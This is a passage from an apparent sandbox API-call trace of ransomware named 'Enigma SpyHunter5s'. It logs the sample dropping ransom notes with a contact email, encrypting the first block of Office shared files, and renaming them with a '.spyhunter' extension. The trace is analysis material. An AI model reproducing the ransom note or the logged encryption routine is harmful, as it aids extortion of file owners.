:\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.138] WriteFile (in: hFile=0x178, lpBuffer=0x248fd53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe7c, lpOverlapped=0x0 | out: lpBuffer=0x248fd53*, lpNumberOfBytesWritten=0x248fe7c*=0x127, lpOverlapped=0x0) returned 1 [0091.139] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.139] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe7c*=0x2ac, lpOverlapped=0x0) returned 1 [0091.139] CloseHandle (hObject=0x178) returned 1 [0091.143] GetProcessHeap () returned 0x2c0000 [0091.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3469c8 | out: hHeap=0x2c0000) returned 1 [0091.143] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.143] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.143] WriteFile (in: hFile=0x178, lpBuffer=0x248fd4f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe78, lpOverlapped=0x0 | out: lpBuffer=0x248fd4f*, lpNumberOfBytesWritten=0x248fe78*=0x127, lpOverlapped=0x0) returned 1 [0091.144] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.144] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe78, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe78*=0x2ac, lpOverlapped=0x0) returned 1 [0091.144] CloseHandle (hObject=0x178) returned 1 [0091.144] GetProcessHeap () returned 0x2c0000 [0091.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e8d8 | out: hHeap=0x2c0000) returned 1 [0091.144] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe18 | out: pbBuffer=0x248fe18) returned 1 [0091.144] GetProcessHeap () returned 0x2c0000 [0091.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.144] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe10*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe10*=0x30) returned 1 [0091.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0091.151] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL") returned 72 [0091.151] StrStrW (lpFirst="MSB1STAR.DLL", lpSrch=".txt") returned 0x0 [0091.151] GetProcessHeap () returned 0x2c0000 [0091.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0091.152] ReadFile (in: hFile=0x174, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdd4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x248fdd4*=0x2800, lpOverlapped=0x0) returned 1 [0091.461] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.462] WriteFile (in: hFile=0x174, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fdd4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x248fdd4*=0x2800, lpOverlapped=0x0) returned 1 [0091.462] GetProcessHeap () returned 0x2c0000 [0091.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0091.462] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.462] WriteFile (in: hFile=0x174, lpBuffer=0x248fe14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdd4, lpOverlapped=0x0 | out: lpBuffer=0x248fe14*, lpNumberOfBytesWritten=0x248fdd4*=0x4, lpOverlapped=0x0) returned 1 [0091.464] WriteFile (in: hFile=0x174, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdd4, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdd4*=0x30, lpOverlapped=0x0) returned 1 [0091.465] CloseHandle (hObject=0x174) returned 1 [0091.468] GetProcessHeap () returned 0x2c0000 [0091.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.468] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL.spyhunter") returned 82 [0091.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll.spyhunter")) returned 1 [0091.469] GetProcessHeap () returned 0x2c0000 [0091.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.469] GetProcessHeap () returned 0x2c0000 [0091.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.469] GetProcessHeap () returned 0x2c0000 [0091.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0091.469] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe10 | out: pbBuffer=0x248fe10) returned 1 [0091.469] GetProcessHeap () returned 0x2c0000 [0091.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.469] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe08*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe08*=0x30) returned 1 [0091.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0091.470] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 74 [0091.470] StrStrW (lpFirst="VBLR6.CHM", lpSrch=".txt") returned 0x0 [0091.470] GetProcessHeap () returned 0x2c0000 [0091.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0091.470] ReadFile (in: hFile=0x174, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdcc, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x248fdcc*=0x2800, lpOverlapped=0x0) returned 1 [0091.477] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.477] WriteFile (in: hFile=0x174, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fdcc, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x248fdcc*=0x2800, lpOverlapped=0x0) returned 1 [0091.478] GetProcessHeap () returned 0x2c0000 [0091.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0091.478] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.478] WriteFile (in: hFile=0x174, lpBuffer=0x248fe0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdcc, lpOverlapped=0x0 | out: lpBuffer=0x248fe0c*, lpNumberOfBytesWritten=0x248fdcc*=0x4, lpOverlapped=0x0) returned 1 [0091.493] WriteFile (in: hFile=0x174, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdcc, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdcc*=0x30, lpOverlapped=0x0) returned 1 [0091.493] CloseHandle (hObject=0x174) returned 1 [0091.509] GetProcessHeap () returned 0x2c0000 [0091.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.509] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.spyhunter") returned 84 [0091.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.spyhunter")) returned 1 [0091.510] GetProcessHeap () returned 0x2c0000 [0091.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.510] GetProcessHeap () returned 0x2c0000 [0091.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.510] GetProcessHeap () returned 0x2c0000 [0091.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b88 | out: hHeap=0x2c0000) returned 1 [0091.510] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0091.510] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.510] WriteFile (in: hFile=0x174, lpBuffer=0x248fd43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe6c, lpOverlapped=0x0 | out: lpBuffer=0x248fd43*, lpNumberOfBytesWritten=0x248fe6c*=0x127, lpOverlapped=0x0) returned 1 [0091.511] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.511] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe6c*=0x2ac, lpOverlapped=0x0) returned 1 [0091.512] CloseHandle (hObject=0x174) returned 1 [0091.512] GetProcessHeap () returned 0x2c0000 [0091.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0091.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe08 | out: pbBuffer=0x248fe08) returned 1 [0091.512] GetProcessHeap () returned 0x2c0000 [0091.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe00*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe00*=0x30) returned 1 [0091.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0091.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX") returned 81 [0091.512] StrStrW (lpFirst="WHTGTXT.SHX", lpSrch=".txt") returned 0x0 [0091.512] GetProcessHeap () returned 0x2c0000 [0091.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.513] ReadFile (in: hFile=0x174, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdc4, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x248fdc4*=0x2800, lpOverlapped=0x0) returned 1 [0091.572] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.572] WriteFile (in: hFile=0x174, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fdc4, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x248fdc4*=0x2800, lpOverlapped=0x0) returned 1 [0091.572] GetProcessHeap () returned 0x2c0000 [0091.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.572] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.572] WriteFile (in: hFile=0x174, lpBuffer=0x248fe04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdc4, lpOverlapped=0x0 | out: lpBuffer=0x248fe04*, lpNumberOfBytesWritten=0x248fdc4*=0x4, lpOverlapped=0x0) returned 1 [0091.594] WriteFile (in: hFile=0x174, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdc4, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdc4*=0x30, lpOverlapped=0x0) returned 1 [0091.594] CloseHandle (hObject=0x174) returned 1 [0091.604] GetProcessHeap () returned 0x2c0000 [0091.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c228d8 [0091.604] wnsprintfW (in: pszDest=0x2c228d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX.spyhunter") returned 91 [0091.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx.spyhunter")) returned 1 [0091.605] GetProcessHeap () returned 0x2c0000 [0091.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c228d8 | out: hHeap=0x2c0000) returned 1 [0091.605] GetProcessHeap () returned 0x2c0000 [0091.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.605] GetProcessHeap () returned 0x2c0000 [0091.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0091.606] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe08 | out: pbBuffer=0x248fe08) returned 1 [0091.606] GetProcessHeap () returned 0x2c0000 [0091.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe00*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe00*=0x30) returned 1 [0091.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.736] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 82 [0091.736] StrStrW (lpFirst="VSTOLoaderUI.dll", lpSrch=".txt") returned 0x0 [0091.736] GetProcessHeap () returned 0x2c0000 [0091.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0091.736] ReadFile (in: hFile=0x178, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdc4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x248fdc4*=0x2800, lpOverlapped=0x0) returned 1 [0091.757] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.757] WriteFile (in: hFile=0x178, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fdc4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x248fdc4*=0x2800, lpOverlapped=0x0) returned 1 [0091.757] GetProcessHeap () returned 0x2c0000 [0091.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0091.758] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.758] WriteFile (in: hFile=0x178, lpBuffer=0x248fe04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdc4, lpOverlapped=0x0 | out: lpBuffer=0x248fe04*, lpNumberOfBytesWritten=0x248fdc4*=0x4, lpOverlapped=0x0) returned 1 [0091.766] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdc4, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdc4*=0x30, lpOverlapped=0x0) returned 1 [0091.766] CloseHandle (hObject=0x178) returned 1 [0091.767] GetProcessHeap () returned 0x2c0000 [0091.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.768] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.spyhunter") returned 92 [0091.768] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.spyhunter")) returned 1 [0091.769] GetProcessHeap () returned 0x2c0000 [0091.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.769] GetProcessHeap () returned 0x2c0000 [0091.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.769] GetProcessHeap () returned 0x2c0000 [0091.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f328 | out: hHeap=0x2c0000) returned 1 [0091.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0091.819] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.819] WriteFile (in: hFile=0xcc, lpBuffer=0x248fd37*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe60, lpOverlapped=0x0 | out: lpBuffer=0x248fd37*, lpNumberOfBytesWritten=0x248fe60*=0x127, lpOverlapped=0x0) returned 1 [0091.820] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.820] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe60, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe60*=0x2ac, lpOverlapped=0x0) returned 1 [0091.820] CloseHandle (hObject=0xcc) returned 1 [0091.820] GetProcessHeap () returned 0x2c0000 [0091.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 